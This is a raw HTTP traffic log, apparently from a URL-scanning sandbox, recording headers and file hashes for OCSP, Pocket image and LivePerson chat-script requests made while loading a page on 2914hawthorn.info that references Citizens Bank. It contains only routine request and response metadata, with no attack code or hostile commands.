access-control-allow-origin: *
cache-control: max-age=272861
expires: Tue, 04 Oct 2022 01:35:35 GMT
date: Fri, 30 Sep 2022 21:47:54 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced\012- data
Size:   10871
Md5:    f62b2664dd6a40ab3a9f7af34412f8b7
Sha1:   02438189257c795c3726e4f45b1ce3bb921255d5
Sha256: 707a3217546ca6852234cb3fa3b61f458581ca943b6195032ba9efe7e1e0ee5f
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C17A343CEB786A421F8C3ABFFFAE350E12C92271A69FC88EB8E8BAB568877D6B"
Last-Modified: Fri, 30 Sep 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5257
Expires: Fri, 30 Sep 2022 23:15:31 GMT
Date: Fri, 30 Sep 2022 21:47:54 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb2016911-a1a6-4bdf-a8f3-89e94a0aaff7.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7810
x-amzn-requestid: 7f6d92e1-c7b1-4dd2-9efa-52ad324ca19d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZMK6pFvkoAMF_yA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6334beaa-362b7368566955966db78385;Sampled=0
x-amzn-remapped-date: Wed, 28 Sep 2022 21:37:46 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: TbPFEVDpMOjK26iu1UGcx56vtP7Pywq05VAylNubOIfbMgo1qGsA-w==
via: 1.1 f13aef0c4b52f6f681401f232d03eb68.cloudfront.net (CloudFront), 1.1 7eb3b782ab09047ce0d11ee03763894c.cloudfront.net (CloudFront), 1.1 google
date: Thu, 29 Sep 2022 23:45:42 GMT
age: 79332
etag: "31b8538deb0f00d5b4182739a4a2fcc1b956a998"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7810
Md5:    456968f691ae9464d69a37bffe9bd7ce
Sha1:   31b8538deb0f00d5b4182739a4a2fcc1b956a998
Sha256: 5cde1e3158e6c6c0b7a01d3bd32f2aa292b3b205f604e5c4ed71cafedad06bf2
                                        
                                            GET /le_secure_storage/3.13.1.0-release_5043/storage.secure.min.js?loc=https%3A%2F%2Fwww3.citizensbankonline.com&site=83789770&force=1&env=prod&isCrossDomain=true HTTP/1.1 
Host: lpcdn.lpsnmedia.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         178.249.97.98
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 30 Sep 2022 21:47:54 GMT
last-modified: Wed, 16 Jun 2021 19:00:26 GMT
content-encoding: gzip
server: ws
vary: Origin
access-control-allow-methods: GET, POST, PATCH
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-state-rev
access-control-expose-headers: X-Requested-With, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-host, Lp-Req-Time, date, x-application-context, strict-transport-security, x-content-type-options, x-download-options, x-xss-protection, x-cache-status, x-amz-id-2, x-amz-request-id, expires, last-modified, set-cookie, content-security-policy, x-frame-options, x-lp-state-rev
access-control-allow-credentials: true
expires: Sat, 30 Sep 2023 21:47:54 GMT
cache-control: max-age=31536000
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
x-cache-status: MISS
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   25188
Md5:    6ac611adba8be3a237f3add1be57d353
Sha1:   bb6a2e15eee31b700de8044024dcefff492b06d6
Sha256: 6d708623b6d3b513f1a871d8a2325f3e00cf3e08c4efb1b9bfba95ffe5b461d9
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe12af206-9f17-40de-9764-14d3cdcb4d2f.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6722
x-amzn-requestid: 6aca2e04-02b4-4e42-8bba-9bbe2ace1ed0
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZPeLrGq1oAMFuAw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633610b0-65b0664d0233107029ef0157;Sampled=0
x-amzn-remapped-date: Thu, 29 Sep 2022 21:40:00 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: DClqs8vTlqibRwXU8dIkkFCUxigTLduturaxCfuvsMtDm-4VXjx2mg==
via: 1.1 4dde8ec6d6c12741888c2d3a059d4a2e.cloudfront.net (CloudFront), 1.1 09331f0822fc98eebaf04130a83dbd44.cloudfront.net (CloudFront), 1.1 google
date: Thu, 29 Sep 2022 22:12:16 GMT
age: 84938
etag: "3248ca3a8b88efd5be8499898fce957d096cf211"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6722
Md5:    5b8d0a19bc0a56bb40a975c5c71af05a
Sha1:   3248ca3a8b88efd5be8499898fce957d096cf211
Sha256: da44d6dd845dc400b0b76f19c67e5a79d9359ce24fe5e4490477f195b23203b4
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F98c23448-09e3-4c05-86c5-dafbe6ca8a0e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8059
x-amzn-requestid: f8bb9e4b-9f3c-47ba-8524-de16155e536d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZNepwHAVoAMFvNA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633544a4-5d884e29378635b60592b618;Sampled=0
x-amzn-remapped-date: Thu, 29 Sep 2022 07:09:24 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: NMiKZSkokVXNTV76vsVJ7VEu6YFfT9MqL7tHtT8CwZq0BwTbXOpm6Q==
via: 1.1 000f4a2f631bace380a0afa747a82482.cloudfront.net (CloudFront), 1.1 ead78c395f4bede3ec6cd7ea180e3d3a.cloudfront.net (CloudFront), 1.1 google
date: Fri, 30 Sep 2022 06:34:26 GMT
age: 54808
etag: "86dd3bf133e9eddf8852f39e1ee695ee599ac886"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8059
Md5:    d21d2bdcedbd619a80017054076319f9
Sha1:   86dd3bf133e9eddf8852f39e1ee695ee599ac886
Sha256: fc5672d5a8e9c6a5ec531f7ba05b65c192af37edf6c3a48105df3685de44ec0d
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6d906d66-cd90-4963-827e-8d0564c0f787.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5106
x-amzn-requestid: a906507c-8820-489c-9978-7d0fd026c862
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZPd5PE0MIAMF3DA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6336103a-49eb3879088f17bc01d177c7;Sampled=0
x-amzn-remapped-date: Thu, 29 Sep 2022 21:38:02 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: aeTAqh8D5whTHS3seyOUj7QCNaITUh2ekHG8vNWZlpSeAnqPuFzmcQ==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Fri, 30 Sep 2022 21:45:50 GMT
age: 124
etag: "3481dce8ab711111fc8863d88bee1a887cfd43ac"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5106
Md5:    13a12db696bc2bf6a6ea2f48f4c1428e
Sha1:   3481dce8ab711111fc8863d88bee1a887cfd43ac
Sha256: 6dae6c9e5de4146e1f528a36a1795225c9731385f13927fc001fb3f9842fe8f1
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9789cead-4e6c-4a12-9b45-25d0efd38fc9.png HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 16011
x-amzn-requestid: d58dfdcd-383a-45ac-8ae2-2b97f016b6a4
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZPdbjFy1IAMF84A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63360f7c-1ca9707a5e5087fd769d9ab6;Sampled=0
x-amzn-remapped-date: Thu, 29 Sep 2022 21:34:52 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: QKHN1asEv6w1mTLxsmn7Oj5AZTsPcg0H8zv5_qQ1BYptjL254kCZdA==
via: 1.1 28a7186077f9b5270d98dd053f31303e.cloudfront.net (CloudFront), 1.1 d01e7742f82df0bbc1fb681d709ed69c.cloudfront.net (CloudFront), 1.1 google
date: Thu, 29 Sep 2022 22:20:36 GMT
age: 84438
etag: "78b798f2cfa7db13a6b5ca2ca2783bece5e77d5d"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   16011
Md5:    1389b1d624b44706c7a6f6b7eb769241
Sha1:   78b798f2cfa7db13a6b5ca2ca2783bece5e77d5d
Sha256: c3c2526b98be06fc7e793e1150bacde2a7bd718e29a851a6e6992e8d84333790
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 30 Sep 2022 21:47:55 GMT
Content-Length: 471
Connection: keep-alive
Last-Modified: Wed, 28 Sep 2022 13:42:46 GMT
Expires: Wed, 05 Oct 2022 13:42:45 GMT
Etag: "2de84cb810b6e40f17384ee270b4d642977246eb"
Cache-Control: max-age=402289,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb5
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 753028e41f121c16-OSL

                                        
                                            GET /le_secure_storage/3.13.1.0-release_5043/storage.secure.min.html?loc=https%3A%2F%2Fwww3.citizensbankonline.com&site=83789770&ist=sessionStorage&env=prod&isCrossDomain=true HTTP/1.1 
Host: lpcdn.lpsnmedia.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         178.249.97.98
HTTP/2 200 OK
content-type: text/html
                                        
date: Fri, 30 Sep 2022 21:47:54 GMT
last-modified: Wed, 16 Jun 2021 19:00:26 GMT
content-encoding: gzip
server: ws
vary: Origin
access-control-allow-methods: GET, POST, PATCH
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-state-rev
access-control-expose-headers: X-Requested-With, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-host, Lp-Req-Time, date, x-application-context, strict-transport-security, x-content-type-options, x-download-options, x-xss-protection, x-cache-status, x-amz-id-2, x-amz-request-id, expires, last-modified, set-cookie, content-security-policy, x-frame-options, x-lp-state-rev
access-control-allow-credentials: true
expires: Sat, 30 Sep 2023 21:47:54 GMT
cache-control: max-age=31536000
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
x-cache-status: MISS
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /postmessage/postmessage.min.html?bust=1631342584828&loc=https%3A%2F%2Fwww3.citizensbankonline.com HTTP/1.1 
Host: va.idp.liveperson.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         208.89.15.170
HTTP/2 200 OK
content-type: text/html
                                        
date: Fri, 30 Sep 2022 21:47:55 GMT
last-modified: Sun, 09 Aug 2020 13:04:00 GMT
etag: W/"5f2ff440-2a51"
server: ws
strict-transport-security: max-age=31536000; includeSubDomains
access-control-allow-methods: GET, POST, PATCH
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-state-rev
access-control-expose-headers: X-Requested-With, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-host, Lp-Req-Time, date, x-application-context, strict-transport-security, x-content-type-options, x-download-options, x-xss-protection, x-cache-status, x-amz-id-2, x-amz-request-id, expires, last-modified, set-cookie, content-security-policy, x-frame-options, x-lp-state-rev
access-control-allow-credentials: true
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---